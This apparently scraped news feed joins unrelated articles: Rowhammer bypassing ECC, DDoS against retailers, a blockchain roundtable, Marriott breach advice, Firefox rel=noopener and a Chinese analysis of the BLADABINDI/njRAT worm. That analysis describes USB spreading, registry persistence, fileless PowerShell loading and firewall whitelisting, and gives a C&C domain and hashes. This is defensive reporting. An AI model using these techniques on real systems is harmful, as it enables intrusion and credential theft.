来自荷兰的一组研究人员已经证实,可以避开纠错码(ECC)保护机制来执行Rowhammer内存操纵攻击。


神奇的数字“3”:一次翻转3个比特即可实现Rowhammer攻击
什么是Rowhammer?

早在2015年,谷歌的Project Zero团队就曾发现,可以反复对相邻行中的存储单元进行充电和放电,来改变单个存储单元的值。如果攻击者准确地知道要攻击的位置,他们就可以更改特定位置,将指令或命令注入内存中,或是授予访问权限以访问包含敏感信息的受限制部分。

ECC保护机制在Rowhammer出现之前就已经开发出来了,ECC代表纠错码,是一种内存存储,包含作为具有高端RAM的控制机制,通常部署在昂贵的或者关键任务型系统中。ECC内存的工作原理是通过检测并校正单个比特值的变化,来防止比特翻转的情况,就像Rowhammer攻击造成的那样。

近日,阿姆斯特丹自由大学(The Vrije Universiteit Amsterdam)的一组研究人员表示,他们已经开发出了一种切实可行的方法,来精确地改变服务器RAM内存芯片中的比特,而不会触发ECC的校正机制。这就使得他们能够篡改数据,注入恶意代码和命令,并更改访问权限,以便可以窃取密码、密钥和其他秘密信息。

这一研究发现可谓意义非凡,因为虽然ECC曾被认为是阻止Rowhammer式攻击的可靠方法,但有人认为从理论上可以绕过这种防御机制。现在这种想法已经得到了证实。

结果是,恶意行为者可以利用该团队提出来的避开服务器上ECC的技术,使用Rowhammer手段从这些高价值目标中提取信息。当然,这些恶意行为者必须先进入他们可以在易受攻击的机器上翻转比特的位置,为了实现这一步,他们可能会使用设备上已有的恶意软件。

神奇的数字“3”

阿姆斯特丹自由大学的研究团队证实,ECC校验错误的方式存在一个可利用的漏洞:当一个比特被改变时,ECC系统会纠正该错误。而当发现两个比特被改变时,ECC就会使程序崩溃。

但如果三个比特可以同时被改变,ECC就无法捕获到这种改动行为。这一点是众所周知的,不过这里的关键是可以证明, 它能够让Rowhammer攻击有机可乘 。

至关重要的是,研究人员发现了一种类似竞争条件(race condition,即两个或多个进程读写某些共享数据,而最后的结果取决于进程运行的精确时序)的情况,这让他们确信可以利用3比特翻转技术有效地操纵RAM地址。

研究人员认为,相比从不需要校正的地址读取内容,从需要纠正比特翻转的内存位置读取内容所花的时间通常来得更长。因此,实验过程中他们依次尝试每个比特,直到找到这样一个可以翻转三个易受攻击的比特的word。最后一步是让两个位置的所有三个比特都不相同,并实施最后一击,一次性翻转所有三个比特:任务完成。

研究人员表示,他们能够在四种不同的服务器系统上测试和重建漏洞:三个系统运行英特尔芯片,另一个系统使用AMD。他们拒绝透露任何特定的内存品牌。

幸运的是,虽然攻击很难防止,但在实际环境下也很难实现。阿姆斯特丹自由大学的研究团队梳理了众多地址以找到易受攻击的地址,然后实际执行Rowhammer攻击。他们表示,在有繁杂的系统中,攻击可能需要长达一周的时间才能顺利实现攻击。

研究人员表示,他们的研究结果不应被视为对ECC的谴责。相反地,它应该向系统管理员和安全专业人员展示ECC只是他们应该与其他安全机制(比如优化的硬件配置和认真仔细的记录及监测等)结合使用的几道保护层之一。

ECC无法阻止针对各种硬件组合的Rowhammer攻击。如果比特翻转的数字足够大,ECC只会减慢攻击速度。

据悉,介绍这种攻击技术的论文题目为《利用纠正码:关于利用ECC内存对付Rowhammer攻击的有效性》,并将于明年在安全与隐私研讨会上正式发表。

E-commerce sites warned of heightened DDoS threat

$
0
0

Distributed denial of service (DDoS) attacks reached their highest levels in November on two of the busiest online trading days of the year, statistics show.

On Black Friday, DDoS protection provider Link11 saw DDoS attacks on e-commerce providers increase by more than 70% compared with other days in November. On Cyber Monday, attacks increased by 109% compared with the November average.

Several attacks observed during Black Friday and Cyber Monday were of up to 100 Gbps , with the average attack on both just under 6Gbps compared with an average of 4.6 Gbps for the months of July to September, which represented a 40% increase compared with the previous quarter.

According to Link11, attacks approaching 6 Gbps “far exceed” the capacity of most websites. In the light of that fact, Link11 is warning online merchants, payment providers and logistics companies to expect further large-scale DDoS attacks in the run-up to the Christmas break.

Marc Wilczek, managing director of Link11, said the e-commerce industry has high expectations of the Christmas trading period. “Both criminals and competitors will take this as an opportunity to cause disruption to or extort the e-commerce industry.

“The growing ‘cybercrime-as-a-service’ sector favours this development. Online retailers should take action now to strengthen their IT security defences against DDoS attacks, in advance,” he said.

To ensure they are better protected against DDoS attacks, which could see them out of business for hours and even days, e-commerce providers can either invest in expanding their infrastructure to absorb peak loads with their own resources or deploy an adaptable cloud defence system.

If e-commerce providers choose the first option, they risk DDoS attackers being able to deliver ever greater attacks to overwhelm services, putting companies with online infrastructures that offer delivery and or payment processing services at risk to DDoS incidents in the run-up to the Christmas holiday.

“Forward-looking companies will benefit from investing in scalable, cloud-based protection solutions to counteract targeted overloads caused by DDoS attacks. Information about website and server failures spreads quickly across social platforms as well as complaints about long loading times. All this can contribute to further revenue losses and long-term reputational damage,” said Wilczek.

Research by German industry association Bitkom found that cyber attacks cost retailers an average of 185,000, including the costs of IT repair, loss of sales revenue and reputational damage to the business.

According to Bitkom, IT repairs typically cost 13,000, while 18,500 is the average cost of enlisting a team of specialist internet providers to restore the business’s online operations, the loss of sales over 48 hours is typically 135,000, and the value of funding reputational damage limitation measures such as a public relations and marketing campaign is around 18,500.

In April 2018, a survey of more than 300 security professionals worldwide found that the majority of respondents cited the loss of customer trust and confidence, the risk of intellectual theft and the threat of malware infection as the most damaging effects on business arising from DDoS attacks, with 78% identifying the loss of customer trust and confidence as the single most damaging effect on business of DDoS attacks.

Any online business or application is vulnerable to DDoS attacks, according to Harshil Parikh, director of security at software-as-a-service platform firm Medallia.

However, there are ways of detecting and mitigating DDoS attacks that any business dependent on the internet can and should use, he told the Isaca CSX Europe 2017 conference in London.

It is important that such organisations take time and effort to build their DDoS defence capabilities, he said, because DDoS attacks are fairly easy and cheap for attackers to carry out.

“With the advent of botnet-based DDoS attack services that will be effective against most companies, anyone can target an organisation for just a few bitcoins,” said Parikh. “Competitors and even disgruntled employees are able to carry our DDoS attacks that can result in loss of reputation as well as lost business worth a lot more than the attacks cost,” he said.

Hacker们如何看待2019年区块链技术的发展与挑战

$
0
0

原标题:Hacker们如何看待2019年区块链技术的发展与挑战

2018年区块链技术的发展受到了非常瞩目的关注,是区块链产业爆发又波澜动荡的一年。近来币圈趋冷,熊市当道,有人认为区块链已然“凉凉”,也有人仍对区块链技术深信不疑。说到底,区块链是一项新兴的前沿技术,我们更想知道各界 Hacker 对于区块链发展现状的判断以及对于前景的思考,他们如何看待 2019 年区块链技术的发展与挑战。

11 月 28 日,在由 Odaily星球日报主办、36Kr 集团战略协办的 P.O.D 新区势峰会上, 比特大陆资深工程师姜和平、八维资本研究总监魏然、长亭科技安全研究员张景驰、Ever Chain 创始人 & CEO 贾永政、DoraHacks 合伙人岳汉超展开了一场关于《华山论剑――各界 Hacker 如何看待 2019 年区块链技术的发展与挑战》的圆桌探讨。

论坛主持人:

DoraHacks 合伙人岳汉超

论坛嘉宾:

比特大陆资深工程师 姜和平

八维资本研究总监 魏然

长亭科技安全研究员 张景驰

Ever Chain 创始人 & CEO 贾永政


Hacker们如何看待2019年区块链技术的发展与挑战
以下是圆桌实录:

(主持人)岳汉超:今天特别荣幸,感谢星球日报、36Kr 的邀请让我们来这做圆桌讨论,也特别感谢四位来自不同背景的 Hackers 百忙中来到现场,有来自比特大陆姜和平、八维资本研究总监魏然、长亭科技安全研究员张景驰、还有来自 Ever Chain 贾永政。四位也先自我介绍一下就是自己平时在做什么和最近忙什么?

姜和平:大家好我叫姜和平。是来自比特大陆的研发工程师,我过去几年一直在做一些技术研发的工作,大概是去年的时候进入到区块链的行业中来,主要的领域是公链技术的研究和开发。我们最近做的两件事情,一个是公有链我们重新设计和实现了一个新的客户端节点软件,第二件事情是给它做了一个基于二层网络架构的智能合约平台。

魏然:大家好,我叫魏然。我来自八维资本,我们是一家跨境的区块链投资机构,在旧金山和北京各有一个办公场地。我们之前已经投了 40 多个区块链底层技术项目和一些战略布局,包括星球日报和 DoraHacks 。我们不仅是一家早期投资公司,也在开展投行和咨询业务,目前正深度布局证券型通证产业,希望能够打通传统世界和加密世界的通道,谢谢大家。

张景驰:大家好,我是来自长亭科技的安全研究员。我之前是在学术圈,导师是 Zcash 主要设计者 Matthew Green 教授,出来后在长亭做区块链安全方向。之前就是客户过来找我们,感觉是被动地做安全,后来我们决定主动去做一些东西。我们最近做的是,监视整个区块链交易市场,以及做一些更学术方向的,如通过形式化验证对整个代码检查是否足够的安全。

贾永政:大家好我叫贾永政,我是清华计算机科学实验班(姚班)2009 级本科,交叉信息研究院的博士。Ever Chain 现在在做去中心化的社交生态,我之前主要的研究方向最早做过一些计算机网络的优化,然后是在线教育、博弈论。我从前年开始做社交网络,主要是在线约会相关的研究,我从 2016 年开始做一些区块链的研究,后来就全职切换到做 AI ,包括社交网络的推荐算法等。

我们有两个核心社交生态的应用在做,一个是用于支持各种区块链活动、资讯、科技普及的产品 Ever 联动,也是今天大家签到和领取序号的 DAPP 。另外是我们即将推出的基于区块链的陌生人交友的软件,现在已经进入到内测的阶段。我们希望通过区块链的技术能够重塑一些传统互联网,甚至是一些比较创新的点看看怎么能跟区块链深度融合,并且在实际生活中落地。

(主持人)岳汉超:各位嘉宾我也或多或少知道一些,就比如说魏然之前是 DAOONE 社区创始人之一,永政也是慕客( MOOC )的发起人之一。其实各位在今年一年的过程中都经历了很多,你们从很早踏入这行业到今天 11 月底,你们怎么看待这一年区块链的发展?第二就是今天大家分享了很多关于行业的一些新的规定、规范,行业一些新的发展,其实我们都知道行业发展其实遇到了一些阻力,那你觉得制约行业发展最大的痛点在哪里?比如说大家平时在工作在创业发展过程中遇到最大的困难在哪?

姜和平:我大概就从技术的角度聊一下自己的看法。今年大家都能感受得到市场的规模和行情变化的比较剧烈,从技术的从业者角度来看,2018 年涌现了很多新的技术上的创新。比如说新的共识算法、密码学上一些新的进展,还有一些像 EOS 这一条公链的发展带给我们很多新的启示。在整个的发展过程当中我们感受到就是整个区块链行业尤其是公链的基础设施还是差,不管是从性能、可用性、配套的设施上来讲,跟互联网还是相差甚远。这差异也不是一天两天就能够解决的,可能还需要整个从业者不断地去发展、进步。

从我自己的感受能看到,就是过去这一年发展出现了很多不一样的地方。从公链上来讲,之前应用的范围很有限,炒一炒然后转一个账,但是今年很多传统金融机构不断地进入到这行业,不论是从投资、技术、服务方面,更主要的是他们的理念有一些变化。很多的传统金融力量的进入,本身对技术是一种看好。他们进来之后会促使区块链的整个业务往一个更宽泛、更坚实的方向上走,也会促使底层技术去给他们做更多支撑和更快速的进化。谢谢大家。

魏然:首先,自由是有限度的;其次,成长是需要时间的。

第一,自由是需要限度的。我们观察从比特币到所谓 ICO ,就是面向无门槛的股权众筹都是在缺乏监管这样的环境下产生的。它的超额利润主要是来自于跨境套利、政策套利,还有所谓的时间套利。时间套利是说无论是科技创新还是金融创新,监管总是滞后的。另外,由于现在的金融行为是跨境的,地域监管和分业监管已经不太适用于现在新的金融形态。但是自由是有限度的,否则就会劣币驱逐良币。我们认为合规性的,至少是和金融科技监管靠拢的区块链发展才是我们看好的方向。

第二,发展是需要时间的。我们认为区块链像一个婴儿一样,它正在不断地长大。之前也出过一篇文章谈到区块链的三波浪潮,我们认为我们已经看到了第一波浪潮,就是比特币为代表的转账支付;第二波浪潮是以以太坊和 ICO 为代表的股权融资,我们认为第三波浪潮是以证券型通证为代表的,它打通了加密事件和传统事件的接口,在一个有限度的自由环境下让区块链成长得更大。

张景驰:前面两位讲的特别好,关于魏然女士讲的一点我想再补充一下。回顾一下 2018 年之前以及 2017 年底的时候,大家对于区块链的兴趣高涨,一个个项目开始慢慢落地,但这只是大热下的第一年,或许是从以太坊的智能合约开始的。从比特币到以太坊这是一个积蓄的过程,到以太坊慢慢大家才开始入场。虽然说 2008 年中本聪发表了一篇论文,但是区块链行业发展也没有几年,它是一个漫长的过程。

我从安全角度来讲一下。因为它的时间短,大家也非常关注产品落地,所以最开始的阶段出现各种各样的安全性问题。比如说 2016 年的The Dao,大概是 1.5 亿美金的损失。但是通过我们最近和商家接触,我们发现商家对于安全意识越来越高。我们之前是只做合约安全,现在也有一些公链和钱包层面的安全方案,大家在应用和想法以及安全意识上都有了提高,整个我认为在区块链安全方面是一个非常好的体现。就是这样,谢谢。

(主持人)岳汉超:长亭是从今年开始区块链业务的吗?

张景驰:长亭是有四五年了,但是区块链业务的话应该是今年。

(主持人)岳汉超:你感觉现在的业务是比六七月份多了还是比六七月份稍微少了一些呢?

张景驰:其实大家看这币圈就知道什么样。但是我认为这是一个好的现象,浪潮过去才能知道谁在裸泳。最开始是劣币驱逐良币,大家都觉得这是一个热潮,就借着风口出来,这些人让整个币圈和链圈特别浮躁,但是最后真正留下的就是真心想做事情的,这是一个非常好的现象。我们看他们写的代码或者说和他们交流的时候,确确实实是一群非常想真正在这方面做点贡献的人。

(主持人)岳汉超:为什么今天是景驰来不是晓航来,是因为昨天晓航凌晨三点告诉我出差,感觉你们的业务还挺忙的。

贾永政:这一年我做了一些技术、产品和研究,发现从去年年底开始区块链变得活跃,开发者发现这不是空谈的概念,而是可以有灵活的场景。不同应用的开发者陆续入场,但又很快陷入迷茫,一些产品本身就有一种新的投资、赌博等各种属性在里面,但是你一旦仔细研究,发现这些东西可能慢慢归于一个庞氏骗局的模型,后来者接盘至很少,在这样的模型里只有极少数参与者在这市场上获利。

经过市场沉寂后,真正回归到技术本身来讲,为什么一定要用区块链、什么东西要放在链上解决,这是一个问题。第二个问题是去中心化。传统互联网产品受益于规模效应,产生了天然的效率优势。去中心化可能带来的好处是让信息更透明从而提高信任度,一定程度上提高了公平性,但牺牲了效率。实际上产业或科技发展早期,确实是效率更重要一点,所以我们看各个公链的时候,每个公链有自己的擅长点,有的牺牲去中心化来追求效率,比如 EOS 用到了 DPOS 这样的共识算法。各种不同的解决方案在一定程度上提高了我们所说的不可能三角的效用边界,让效率、安全、去中心化三者有机融合,这实际上实在解决一个多目标优化的问题。

不同的应用在不同的业务场景中侧重的指标不同,尤其我们发现实际上项目落地到产品过程中,可能并不那么依赖去中心化,对于一个互联网产品来讲,早期恰恰需要尽快集结一些中心化的资源优势。

我觉得区块链产品对于对互联网有理解但是对区块链没有理解的用户来说,是有很高的准入门槛的。有时候会将绝大多数互联网用户拒之门外,对此我非常困惑。当你去做一款区块链产品,你就会考虑到各种各样的问题让互联网用户去接受你的 DApp 。

(主持人)岳汉超:我有一点想问永政,因为我也离开学校很久了。永政你是高校出来,我们其实很关心高校里最尖端的学生对于区块链的态度是什么?因为我们看到全球非常领先的区块链社区 Blockchain@Berkeley,Stanford Blockchain Collective ,还有 MIT Bitcoin Club,还有各家 Blockchain Society 在印度、欧洲各地牵动着区块链行业,也是带动当地社区发展,我们可以看到国内高校踏实做事的团队,但是没有看到说非常非常能够引领行业、引领社区发展、经常去发声的这么一个社区的存在,所以就很好奇,因为你跟他们更近一点,相信你的团队也有很多他们的学生,所以想听听他们的态度是什么?

贾永政:首先我觉得区块链技术非常难,就如今天徐教授所说它融合了计算机学科最前沿的问题,包括分布式系统、密码学、博弈论和机制设计等。这三块哪一块要做非常深入的研究都是很有挑战的,至少我做过一些区块链的研究觉得是不简单的。因为在学校读一个系统方向的博士往往比其它方向更难,需要六年的时间;密码学入门还好,做深就很难;博弈论本身有一套理论体系,然后要融入到密码学,甚至去基于分布式系统做机制设计就非常有挑战了,因此这里面各个研究方向都有非常深入的课题值得去做。所以我觉得研究区块链给计算机科学研究不同领域的人提供了很好的合作的机会。有的公链项目优势在系统上,有的团队优势在密码学上,相当于把世界上最优秀的做各个领域研究者集结到一起。

所以我们看到不管区块链 Token 的市场有多么颓势,整个区块链学术圈特别活跃,包括国际上顶级的几个区块链都很活跃,而且不同的优秀青年研究者都来做这一件事情,这令人感到兴奋。相较于门槛非常高的 AI 来讲,做到一定高度就会集中于国际主流的那几个圈子,但是区块链吸引了不同领域的人入场,这是很好的一点。另外,技术从长远来讲解决的不仅仅是技术本身的问题,还有很多社会、哲学的问题。

(主持人)岳汉超:特别好。刚才我们聊到了 2018 年行业发展各自遇到的一些困难,所以其实现在的整个市场可以说是一个寒冬的状态,那包括比特大陆、八维、长亭我们明年在寒冬中的如何继续生存下去,大家的下一步的计划是什么?可不可以在这里跟大家分享一下?

姜和平:看情况市场行情也不会在短时间内有特别大的反转,对于技术来讲是特别好的机会,大家可以沉下心来把最有价值、最困难的东西做好。我们明年希望能够在公链上把智能合约的平台、基础设施构建好,给应用者和开发者更低的门槛、更友好的界面等。当这些事情都做好后,另一方面,我们希望能和一些业务方一起把整个业务在区块链平台上落地,让区块链技术真正体现它的价值。在一些大家比较看好的方向,比如金融方向的 STO、通证、跟游戏相关的结合等等,这是我们明年想做的事情。

(主持人)岳汉超:OK,和平哥还是很踏实的从产品出发。魏然?

魏然:资本寒冬是一个季节,金融里经常提到周期,有波峰有波谷。当波谷时期,你无论朝哪个方向走都是在往上走,需要做功,所以很疲惫。但实际上是把一个混乱无序的市场变得更加有秩序,是在往一个好的方向发展,所以我们认为短期内是波谷状体啊,长远来看,技术、市场都是向好的。

如果说科技是一个婴儿,我们就是培养皿,温度变化影响到科技的成长速度,甚至影响到是否幸存还是会夭折。我们之前投的项目很多都是硅谷的底层技术设施,刚才提到高校,斯坦福、MIT 他们的教授出来创业,很多的风投基金会追着他们给他们的钱,这就是一个非常优良的季节和让新兴产业茁壮生长的创新环境。我们也希望给中国的创业者们创造这样一个好的环境。

另一个我们应对寒冬的方式是捕猎新的猎物。我们最近深度布局的 Security Token 产业就是希望在合规的框架下让更多人可以接触数字资产,合规的好处就是可以让机构投资的钱进入市场,这是新一轮牛市的开启点。大概就是这样。

张景驰:我同意魏然,整个市场是往好的方向发展。币价吸引了大家的眼球,像永政哥说的各行各业的优秀人才进入这个圈子,最开始吸引眼球的可能是币价或其他一些噱头的东西,但作为一个区块链安全从业者,今年吸引眼球的另一波东西是各种各样 DApp 和非常优秀的公链。

区块链与其说与其他技术不一样,也可以说是一样的。我们是做安全方面的,在工作的时候客户关心的是我的合约安不安全、公链安不安全,但随着区块链慢慢发展下去,大家都会认识到,区块链和传统行业并没有比较大的区别,无论区块链什么样子,基于网络生态环境还有一些非常底层的东西是不变的。就算是合约,公链安全,如果一些员工掌管公司的密钥,但他的用户行为特别不安全,整体来看其实还是不安全。

长亭现在在做的就是希望给客户一个非常全套的从最底层代码,网络环境、沙箱怎么设计、怎么上链一直到最上层代码的问题。从下到上完完整整的安全方案,这是我们 2019 年里面要加大力度做的事情。总的来说我认为 2019 年还会激起很多浪花,因为 2018 年我们看到一些非常优秀的公链,虽然币价不太好,但是 2019 年的整体趋势我认为是非常好的。谢谢。

贾永政:区块链最开始出来有一个应用场景到后来经过中间的沉寂,2014 年、2015 年没有找到核心的应用,到以太坊出来涌现出大量的应用。

之前很多团队都说我要做公链,各种各样号称解决区块链的世界上顶级难题,要解决不可能三角问题、显著提高公链项目的各种指标,如在高性能、保护隐私的同时实现很强的去中心化等等。到现在反倒迷茫了,因为即使大家说得再好,有天花乱坠的解决方案、各种各样扩容隐私保护的项目,真正落地的却很少。现在公链项目有好几百个,可能最后幸存下来可能也只有个位数。所以基本上这赛道给大家的机会不是很多了。我有几点预测吧,我觉得 2019 年首先大量的公链项目会开始考虑做 DApp ,或者考虑面向指定的行业去定制,而这个趋势我觉得联盟链会要比公链发展更快。

为什么我觉得是这一点?第一公链赛道非常拥挤,最后幸存者会是少数。实际上公链的用户是在公链开发的这些开发者,而不是终端用户,没有人去拥护你的公链信仰,就没有终端用户。所以公链跟实际的终端用户中间隔着一层,公链开发者会逐渐发现他们需要直接面向用户提供解决方案。

我们的目标是向百万用户提高整个陌生社交的体验,所以说我们选择了直接面向用户,我们来做 DApp 。现在绝大多数的公链没有第三方开发者愿意用他的公链,他们需要自己做 DApp 来有意引导开发者,或者站在 DApp 开发者的角度去优化他的公链。

另外一个虽然大家现在做通用的基础公链,这个赛道没有红利后,就会面向不同行业做定制,我们发现优秀的面向医疗行业、教育行业的项目,其实在这些项目 Token 的作用并不特别大。2B 的定制很多采用了联盟链的解决方案,因为明显联盟链比较拥抱监管,所以我觉得联盟链肯定在2B的场景落地比公链要快,而且是面向 2B 的行业定制,基于这两点判断我觉得 2019 年整体来讲就是链圈的市场会非常好,而公链的市场会经过一个比较明显的洗牌优胜劣汰的过程。在这一年很有可能会有一些杀手级的 DApp 出现,这些应用的用户数绝对不是你现在看到的数量。目前我们所看到的区块链应用:以太坊和 EOS 上的游戏,数字货币交易所等,日活用数目前只能以万来计,将来会有达到百万量级的 DApp 出现。所以未来的两个方向,一个是真正面向 2B 行业的定制化,另一个是面向 2C 出现百万级别活跃度的 DApp ,会让人们真正看到区块链行业的未来。

文章来源丨36氪 文章为原作者观点,不代表BB财经立场。

攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

$
0
0

攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

BLADABINDI,也被称为njRAT或Njw0rm,是一种远程访问木马(RAT),具有众多后门功能――从键盘记录到执行分布式拒绝服务(DDoS)。自首次出现以来,该木马就已经在各种网络间谍活动中被重新编译和使用。事实上,BLADABINDI的可定制性以及可以在暗网地下黑市购买到的特性使得它成为一个广泛存在的威胁。举个例子:在上周,趋势科技就遇到了一种蠕虫病毒(由趋势科技检测为Worm.Win32.BLADABINDI.AA),它通过可移动驱动器传播,并安装了BLADABINDI后门的无文件版本。

虽然趋势科技表示他们尚不清楚恶意文件是如何被放入受感染系统的,但其传播例程表明它是通过可移动驱动器进入系统的。除此之外,BLADABINDI对灵活且易于使用的脚本语言AutoIt的使用也是值得注意的。它使用AutoIt(FileInstall命令)将payload和主脚本编译成了单个可执行文件,这会使得payload (后门)很难被检测出来。


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图1.用于展示已编译AutoIt脚本常见痕迹的屏幕截图(突出显示部分)

技术分析

趋势科技使用了AutoIt脚本反编译器来解析可执行文件的AutoIt脚本,发现脚本的主函数首先会从系统的%TEMP%目录中删除所有名为“Tr.exe”的文件,以便它可以放入自己的Tr.exe版本。放入的文件将在终止了具有相同名称的所有进程之后执行。另外,它还会将自身的一个副本放入同一个目录中。为了建立持久性,它会在%STARTUP%目录中为文件添加快捷方式。

为了进行传播,它会将自身的隐藏副本放到在受感染系统上找到的所有可移动驱动器中。与此同时,它还会放入一个快捷方式文件(.LNK),并将可移动驱动器上的所有原有文件从其根目录移动到一个名为“sss”的新建文件夹中。


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图2.此代码快照用于展示经过反编译的脚本


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图3.此代码快照用于展示如何使用AutoIt的FileInstall命令将AutoIt脚本与任何文件捆绑在一起,然后在脚本执行期间加载这些文件


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门
攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图4:此代码快照用于展示快捷方式是如何被添加的(上)以及它如何通过可移动驱动器传播(下)

放入的Tr.exe实际上是另一个经AutoIt编译的可执行脚本(Trojan.Win32.BLADABINDI.AA)。对它进行反编译,可以看到它包含一个base-64编码的可执行文件,它将在注册表HKEY_CURRENT_USER\Software中的一个名为“Valuex”的注册表值中写入。

它还将创建另一个值,以建立持久性。它将使用一个名为“AdobeMX”的自运行注册表(HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run)来执行PowerShell,以通过反射加载(从内存而不是从系统的硬盘加载可执行文件)来加载经编码的可执行文件。

由于可执行文件直接从注册表加载到PowerShell的内存,因此研究人员能够转储恶意可执行文件所在的特定地址。趋势科技发现,它是采用.NET编译的,并使用了商业代码保护软件进行混淆。


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图5:用于展示PowerShell加载经编码的可执行文件的屏幕截图

BLADABINDI/njRAT payload BLADABINDI后门的变种使用了water-boom[.]duckdns[.]org来作为其命令和控制(C&C)服务器,位于端口1177上。与之前的BLADABINDI变种一样,与这个无文件版本的C&C服务器相关的URL使用的是动态域名系统(DNS)。这允许攻击者隐藏服务器的实际IP地址,或根据需要来更改/更新它。

从C&C服务器下载的所有文件都作为Trojan.exe存储在%TEMP%文件夹中。它使用字符串5cd8f17f4086744065eb0992a09e05a2作为其互斥锁以及受感染计算机中的注册表配置单元。它使用值tcpClient_0作为它的HTTP服务器,在那里它将接收从受感染计算机中窃取的所有信息。但是,由于该值被设置为null,因此所有被窃取的信息都将发送到相同的C&C服务器。

当后门运行时,它会创建一个防火墙策略,将PowerShell的进程添加到白名单中。BLADABINDI的后门功能如图7所示,包括键盘记录、检索和执行文件,以及从Web浏览器窃取凭证。


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门
攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图6:用于展示BLADABINDI变种配置的代码快照(上)以及它如何创建防火墙策略来将PowerShell添加到白名单中(下)


攻防最前线:新型蠕虫BLADABINDI可通过移动驱动器传播无文件后门

图7.该BLADABINDI变种的后门功能

最佳实践

这个蠕虫病毒的payload、传播方式以及在受感染系统中以无文件形式传播后门的技术,使其成为一个重大的威胁。用户,尤其是仍在工作中使用可移动媒体的企业应该采取必要的安全防卫措施。限制和保护可移动媒体或USB功能,或PowerShell之类工具的使用(特别是在具有敏感数据的系统上),并主动监控网关、端点、网络和服务器,以查看异常行为和迹象,如C&C通信和信息窃取。

IoC

相关散列(SHA-256):

c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e -Worm.Win32.BLADABINDI.AA 25bc108a683d25a77efcac89b45f0478d9ddd281a9a2fb1f55fc6992a93aa830 - Win32.BLADABINDI.AA

相关恶意URL:

water[-]boom[.]duckdns[.]org(C&C服务器)

声明:本文来自黑客视界,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

Marriott's Starwood Data Breach - 5 Steps to Protect your Data

$
0
0

What can you do if you’re one of the 500 million Marriott International Inc. guests affected by the massive data breach announced today? According to the company’s announcement , the breach affects guests who stayed at the Marriott’s Starwood properties from 2014 through Sept. 10, 2018. For approximately 327 million of impacted guests, Marriott says the breached information includes some combination of:

Mailing address Phone number Email address Starwood Preferred Guest (“SPG”) account information Birthdate Gender Arrival and departure information Reservation date Communication preferences.

Credit and debit card numbers were also included in the breach. While Marriott notes this information was encrypted according to the AES-128 standard, they do not yet know if the components required to decrypt these numbers have been compromised.


Marriott's Starwood Data Breach - 5 Steps to Protect your Data
[Source: Apple ]

If you’ve made a reservation at a Starwood property in the last four years (this includes Sheraton, Westin, Four Points, many other brands , and Starwood-branded timeshares), take these steps to minimize your exposure:

Change your password.This should be your default response to the news of any hack that might involve your information. If you use the same password in multiple places, be sure to change your password everywhere.

Implement Multi-factor Authentication (MFA).A breached password is only useful if the bad guys can use it. A second step of authentication, like a code sent via SMS to your phone, can render that breached password useless (but you should still change your password).

Monitor your accounts.Marriott’s system was compromised for an extended period of time. Check your accounts weekly.

Consider freezing your credit.You can put a credit hold on your accounts, but in most U.S. states, the hold remains permanent until you request a thaw. This guide from NerdWallet provides more details.

Watch out for phishing attempts.“Phishing attempts can be more credible when someone has access to actual personal details,” says Auth0 Principal Security Engineer Emory Lundberg. This hack includes data that could social engineering attempts easier. For more advice on avoiding phishing attempts, check out thispost by Annybell Villarroel, Auth0 Security Operations Manager.


Marriott's Starwood Data Breach - 5 Steps to Protect your Data
[Source: PixaBay ] Marriot's Data Breach Response Plan

In addition, Marriott has taken the following steps to help guests monitor and protect their information:

Dedicated Call Center

Marriott has established a dedicated call center to answer questions you may have about this incident. The call center is open seven days a week and is available in multiple languages. Our dedicated call center may experience high call volume initially, and we appreciate your patience.

Email Notification

Marriott began sending emails on a rolling basis on November 30, 2018 to affected guests whose email addresses are in the Starwood guest reservation database.

Free WebWatcher Enrollment

Marriott is providing guests the opportunity to enroll in WebWatcher free of charge for one year. WebWatcher monitors internet sites where personal information is shared and generates an alert to the consumer if evidence of the consumer’s personal information is found. Due to regulatory and other reasons, WebWatcher or similar products are not available in all countries. Guests from the United States who complete the WebWatcher enrollment process will also be provided fraud consultation services and reimbursement coverage for free. Click on your country, if listed, to begin the enrollment process.

About Auth0

Auth0, a global leader in Identity-as-a-Service (IDaaS), provides thousands of enterprise customers with a Universal Identity Platform for their web, mobile, IoT, and internal applications. Its extensible platform seamlessly authenticates and secures more than 1.5B logins per month, making it loved by developers and trusted by global enterprises. The company's U.S. headquarters in Bellevue, WA, and additional offices in Buenos Aires, London, Tokyo, and Sydney, support its customers that are located in 70+ countries.

For more information, visithttps://auth0.com or follow @auth0 on Twitter .


Firefox security: rel=noopener for target=_blank

$
0
0

Mozilla is testing a new security feature in Firefox Nightly currently that adds rel="noopener" automatically to links that use target="_blank".

Target="_blank" instructs browsers to open the link target in a new tab in the web browser automatically; without the target attribute, links would open in the same tab unless users use built-in browser functionality, e.g. by holding down Ctrl or Shift, to open the link in a different way.

Rel="noopener is supported by all major web browsers. The attribute makes sure that window-opener is null in modern browsers. Null means that it contains no value.

If rel="noopener" is not specified, linked resources have full control over the originating window object even if the resources are on different origins. The destination link could manipulate the originating document, e.g. replace it with a lookalike for phishing, display advertisement on it or manipulate it in any other way imaginable.

You can check out a demo page on rel="noopener" abuse here . It is harmless but highlights how destination sites may alter the originating site if the attribute is not used.


Firefox security: rel=noopener for target=_blank

Rel="noopener" protects the originating document. Webmasters can -- and should -- specify rel="noopener" whenever they use target="_blank"; we use the attribute on all external links here on this site already.

Apple implemented a change in Safari in October that applies rel=noopener automatically to any link that uses target=_blank.

The Nightly version of Firefox supports the security feature as well now. Mozilla wants to collect data to make sure that the change does not break anything major on the Internet.

